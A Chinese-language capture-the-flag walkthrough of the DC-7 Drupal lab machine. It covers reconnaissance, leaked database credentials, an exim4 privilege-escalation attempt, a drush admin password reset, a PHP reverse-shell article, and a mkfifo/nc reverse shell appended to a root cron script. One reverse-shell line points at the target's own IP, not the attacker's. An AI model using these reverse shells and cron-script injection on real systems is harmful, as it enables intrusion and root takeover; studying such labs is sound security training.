目錄

DC-7靶機(jī)滲透測試

1、信息收集

1.1 掃描開放的端口

1.2 訪問WEB站點(diǎn)

2、登錄ssh

3、 提權(quán)（suid提權(quán)）

3.1 exim4提權(quán)

4、drush 命令對任意用戶密碼進(jìn)行更改

5、登錄admin

6、拿到root權(quán)限

---

?

DC-7靶機(jī)滲透測試

0x00實(shí)驗(yàn)環(huán)境

kali的IP：192.168.3.188
DC-7的MAC地址：00:0C:29:FB:B4:27（192.168.3.191）

（使用Kali中的arp-scan工具掃描也可）

1、信息收集

1.1 掃描開放的端口

nmap -A 192.168.3.191 -p 1-65535 -oN nmap.A

發(fā)現(xiàn)開放了80端口和22端口

1.2 訪問WEB站點(diǎn)

發(fā)現(xiàn)是Drupal（是國外三大開源的PHP CMS 之一）

提示：
DC-7引入了一些“新”概念，但我將讓您弄清楚它們是什么。 :-)
盡管此挑戰(zhàn)并不是技術(shù)性的全部，但如果您需要訴諸于暴力破解或字典攻擊，您可能不會成功。
您將要做的就是在盒子外面思考。 方式在盒子外面。 :-)

1.2.1 掃描網(wǎng)站目錄

命令：dirb http://192.168.3.191/

嘗試掃描網(wǎng)站目錄，沒發(fā)現(xiàn)什么有價值的目錄，發(fā)現(xiàn)了robotx.txt文件，這個文件作為常見的可以讓爬蟲程序掃描的文件之一，控制是否想讓爬蟲去爬取本站信息

對于robots.txt文件，對里面的目錄或者文件都進(jìn)行了訪問查看，未發(fā)現(xiàn)有用的信息

1.2.2? 通過查詢DC7USER查詢到DC7-User用戶

查詢了解到網(wǎng)站左下角為@DC7USER為推特的聯(lián)系方式，通過查詢DC7USER查詢到DC7-User用戶，從而查詢到如下信息，明顯與DC-7相關(guān)

https://github.com/Dc7User/staffdb

發(fā)現(xiàn)config.php，得到數(shù)據(jù)庫的用戶名和密碼（滲透測試是需要經(jīng)驗(yàn)積累的，不然很多都想不到！！！）

<?php$servername = "localhost";$username = "dc7user";$password = "MdR3xOgB7#dW";$dbname = "Staff";$conn = mysqli_connect($servername, $username, $password, $dbname); ?>

看樣子是網(wǎng)站mysql數(shù)據(jù)庫連接的用戶名、密碼，所有這里就不登錄網(wǎng)站了，直接登錄后臺。dc7user / MdR3xOgB7#dW

在user/login 登錄，登錄失敗

2、登錄ssh

用ssh登錄：ssh dc7user@192.168.3.191，登錄成功！

查看dc7user家目錄下有backup文件夾

Gpg后綴文件為加密后的文件，需要有秘鑰和密碼才能解密。（website.sql和website.tar.gz文件現(xiàn)在都是加密過的）

我們再看看mbox有什么：發(fā)現(xiàn)友有好多郵件（From: root@dc-7 (Cron Daemon)??????? To: root@dc-7）

其中的主要信息有：

Shell腳本文件 ??/opt/scripts/backups.sh

數(shù)據(jù)庫文件：/home/dc7user/backups/website.sql

網(wǎng)站數(shù)據(jù)： /home/dc7user/backups/website.tar.gz

從目前情況來看，website.sql和website.tar.gz文件現(xiàn)在都是加密過的，現(xiàn)在只能把目光放在另一個文件backups.sh上

2.3.1 查看一下backups.sh這個腳本文件

順利找到了加密的秘鑰，只是解密需要root權(quán)限才可以

3、 提權(quán)（suid提權(quán)）

思路1、sudo -l（查看有沒有一些命令在執(zhí)行期間有root權(quán)限標(biāo)簽沒有密碼保護(hù)——Not found）

思路2、查看有沒有一些具有suid權(quán)限的命令

find / -perm /4000 2>dev/null

3.1 exim4提權(quán)

3.1.1 查看exim4版本

/usr/sbin/exim4 --version

發(fā)現(xiàn)exim4命令的版本是4.89

3.1.2 使用searchsploit查找響應(yīng)漏洞

searchsploit exim 4.

?Local Privilege Escalation（本地特權(quán)升級）

3.1.3 將響應(yīng)漏洞拷貝到靶機(jī)

scp遠(yuǎn)程拷貝

把它弄到靶機(jī)里，使用scp：
需要先在kali開啟ssh服務(wù)------Kali ssh服務(wù)
dc7user@dc-7:~$ scp root@192.168.3.188:/usr/share/exploitdb/exploits/linux/local/46996.sh /tmp/? （在dc7user@dc-7:~$下拷貝）

運(yùn)行exp，錯誤：

./46996.sh -m netcat

有個^M，查看此exp后，看到結(jié)尾都是M，百度后的文章：
解決“/bin/bash^M: bad interpreter: No such file or directory”
sed -i "s/\r//" 46996.sh

?

重新執(zhí)行exp，先監(jiān)聽kali上的8888端口：
./46996.sh -m netcat
nc -e /bin/bash 192.168.3.188 8888

?

這里很快就會斷鏈了，所以要快點(diǎn)：
python -c 'import pty;pty.spawn("/bin/bash")'

切換root失敗了，怎么辦啊啊啊啊啊~

無果！

4、drush 命令對任意用戶密碼進(jìn)行更改

查詢drush是drupal shell專門管理drupal站點(diǎn)的shell，使用drush掃描得知drupal用戶為admin，cms的管理用戶

嘗試重置admin用戶密碼，說明admin用戶存在

存在！

若用戶不存在則是下面這種情況

?

重置admin密碼為admin，必須在/var/www/html目錄下執(zhí)行

通過查詢可知drush 命令可以對任意用戶密碼進(jìn)行更改

drush user-password admin --password="123456"

5、登錄admin

到后臺后想上傳一句話木馬進(jìn)行連接，發(fā)現(xiàn)沒有php模塊，這樣就沒辦法解析php，在extend中點(diǎn)擊添加php模塊

返回頁面選擇php添加

點(diǎn)擊install

先在kali上監(jiān)聽8888端口：nc -lvvp 8888

?

Add content——》Article

寫入反彈shell（OS命令注入）

content創(chuàng)建成功！

在kali上監(jiān)聽已拿到反彈shell

python -c 'import pty;pty.spawn("/bin/bash")'打開shell交互

6、拿到root權(quán)限

kali本地監(jiān)聽8888端口

在/opt/scripts/目錄下面輸入如下命令

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.3.191 8888 >/tmp/f" >> backups.sh

反彈成功！

查看theflag文件

總結(jié)

以上是生活随笔為你收集整理的【CyberSecurityLearning 76】DC系列之DC-7渗透测试（Drupal）的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。